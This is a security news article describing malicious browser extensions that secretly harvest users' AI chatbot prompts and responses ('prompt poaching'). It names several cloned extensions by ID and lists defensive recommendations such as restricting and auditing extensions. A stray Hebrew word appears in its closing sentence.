A new wave of malicious browser extensions is quietly harvesting sensitive user interactions with AI tools, in a growing threat now dubbed “prompt poaching.”
The rise of AI assistants in everyday browsing has created a usability gap. Most users interact with AI tools in isolated tabs, manually copying and pasting content for analysis or summarization.
To address this limitation, developers introduced AI-powered browser extensions that can access content across multiple tabs, enabling seamless workflows and real-time assistance.
Security researchers warn that these extensions are actively monitoring AI conversations and exfiltrating the data to attacker-controlled servers without user awareness.
However, this added convenience comes at a cost. By integrating deeply with browser activity, these extensions gain visibility into sensitive user data, including emails, financial information, and confidential documents.
Malicious Browser Extensions
According to security firm Secure Annex, several incidents over the past month have revealed malicious Chrome extensions performing unauthorized data collection.
These extensions mimic legitimate tools but include hidden functionality designed to monitor AI-related browser tabs.
Once an AI interface is detected, the extension captures both user prompts and AI-generated responses. This is achieved through techniques such as API interception or Document Object Model (DOM) scraping.
The collected data is then packaged and transmitted to external servers controlled by attackers.
This practice, now referred to as “prompt poaching,” poses significant privacy and security risks, especially as users increasingly rely on AI tools for both personal and professional tasks.
Many of the identified malicious extensions are clones of popular, trusted tools. Attackers replicate legitimate extensions and inject malicious code before distributing them through browser marketplaces.
Notable examples include fake versions of AI assistant extensions resembling those developed by AITOPIA. These clones retain expected functionality while secretly exfiltrating user data. Some identified extensions include:
- Chat GPT for Chrome with GPT-5, Claude Sonnet & DeepSeek AI (ID: fnmihdojmnkclgjpcoonokmkhjpjechg).
- AI Sidebar with Deepseek, ChatGPT, Claude, and more (ID: inhcgfpbfdjbjogdfjbclgolkmhnooop).
- Talk to ChatGPT (ID: hoinfgbmegalflaolhknkdaajeafpilo).
In other cases, legitimate extensions have been retrofitted with malicious capabilities after gaining a large user base.
The Urban VPN Proxy extension is a notable example, where threat actors introduced AI conversation harvesting functionality post-deployment, affecting existing users without requiring reinstallation.
Security and Business Risks
Stolen AI conversations may contain sensitive corporate data or personally identifiable information (PII).
For organizations, the risk is particularly severe. Employees using compromised extensions may inadvertently expose intellectual property or confidential communications, leading to potential regulatory and financial consequences.
Security experts recommend a proactive approach to mitigate risks associated with AI-enabled browser extensions:
- Restrict installation of unapproved extensions using enterprise browser management tools or Group Policy.
- Prefer official extensions developed by trusted AI vendors or use standalone desktop and mobile applications.
- Carefully review extension permissions and avoid tools requesting excessive access unrelated to their functionality.
- Conduct periodic audits of installed extensions and monitor for unusual network activity or connections to unknown domains.
- Identify workflow gaps that drive users toward unofficial tools and replace them with sanctioned, secure alternatives.
As AI adoption continues to grow, so does the attack surface. Prompt poaching highlights the need for stricter controls and greater awareness סביב browser-based AI integrations, where convenience must be balanced with security.
Follow us on Google News, LinkedIn, and X to Get Instant Updates and Set GBH as a Preferred Source in Google.

